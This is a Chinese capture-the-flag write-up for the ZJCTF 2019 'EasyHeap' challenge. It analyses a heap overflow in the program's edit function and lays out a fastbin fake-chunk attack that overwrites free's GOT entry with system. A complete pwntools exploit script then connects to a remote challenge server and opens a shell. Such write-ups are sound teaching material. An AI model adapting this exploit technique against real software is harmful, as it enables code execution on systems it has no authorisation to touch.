[ZJCTF 2019]EasyHeap

逆向分析

--------------------------------
       Easy Heap Creator       
--------------------------------
 1. Create a Heap               
 2. Edit a Heap                 
 3. Delete a Heap               
 4. Exit                        
--------------------------------
Your choice :

create 函数

    heaparray[i] = malloc(size);
    read_input(heaparray[i], size);
  • heaparray[i]:存放 chunk 的地址。
  • read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。

edit 函数

    read_input(heaparray[v2], v0);
  • read_input(heaparray[v2], v0):向 chunk 中写入 v0 大小的内容,也就是说如果 v0 比 create 时的 size 大的话就会造成堆溢出。

delete 函数

    free(heaparray[v1]);
    heaparray[v1] = 0LL;
  • free 掉对应 chunk 且指针置 0 了。

利用思路

  • 创建3个 chunk ,chunk 0 1 2 ,chunk 1 的内容为 /bin/sh 。
  • 我们可以用 house of spirit 技术,伪造 chunk 至 heaparray 附近,这样操作在 malloc fastbin 时需要绕过大小判断,我们可以巧妙地利用地址开头 7f 来伪造大小为 0x70 的 fastbin 。
gdb-peda$ x /20xw 0x6020a0 - 3
0x60209d:	0x20000000	0x242d0af6	0x0000007f	0x00000000
0x6020ad:	0xe0000000	0x242d0ae8	0x0000007f	0x00000000
0x6020bd:	0x00000000	0x00000000	0x00000000	0x00000000
0x6020cd:	0x00000000	0x00000000	0x00000000	0x00000000
0x6020dd:	0x10000000	0x0000d7b0	0x80000000	0x0000d7b0

  • 然后通过伪造的 fastbin 输入内容覆盖 chunk 0 的地址为 free_got 的地址。
  • 通过编辑 chunk 0 将 free_got 地址改为 system 的地址。
  • 这样 free chunk 1 就会执行 system('/bin/sh') 拿 shell。

exp 脚本

from pwn import *

#p = process('./easyheap')
p = remote('node3.buuoj.cn',26672)
elf =ELF('./easyheap')

context.log_level = 'debug'

def create(size,content):
	p.recvuntil('Your choice :')
	p.sendline('1')
	p.recvuntil('Size of Heap : ')
	p.send(str(size))
	p.recvuntil('Content of heap:')
	p.send(str(content))	

def edit(index,size,content):
	p.recvuntil('Your choice :')
	p.sendline('2')
	p.recvuntil('Index :')
	p.sendline(str(index))
	p.recvuntil('Size of Heap : ')
	p.send(str(size))
	p.recvuntil('Content of heap : ')
	p.send(str(content))

def free(index):
	p.recvuntil('Your choice :')
	p.sendline('3')
	p.recvuntil('Index :')
	p.sendline(str(index))

free_got = elf.got['free']

create(0x68,'aaaa')
create(0x68,'bbbb')
create(0x68,'cccc')
free(2)

#gdb.attach(p)

payload = '/bin/sh\x00' + 'a' * 0x60 + p64(0x71) + p64(0x6020b0-3)
edit(1,len(payload),payload)

create(0x68,'aaaa')
create(0x68,'c')

payload = '\xaa' * 3 + p64(0) * 4 + p64(free_got)
edit(3,len(payload),payload)
payload = p64(elf.plt['system'])

#gdb.attach(p)

edit(0,len(payload),payload)
free(1)

#gdb.attach(p)

p.interactive()

get flag

内容来源

buuctf pwn | summerN's blog

posted @ 2020-03-02 15:45  PwnKi  阅读(2672)  评论(5编辑  收藏  举报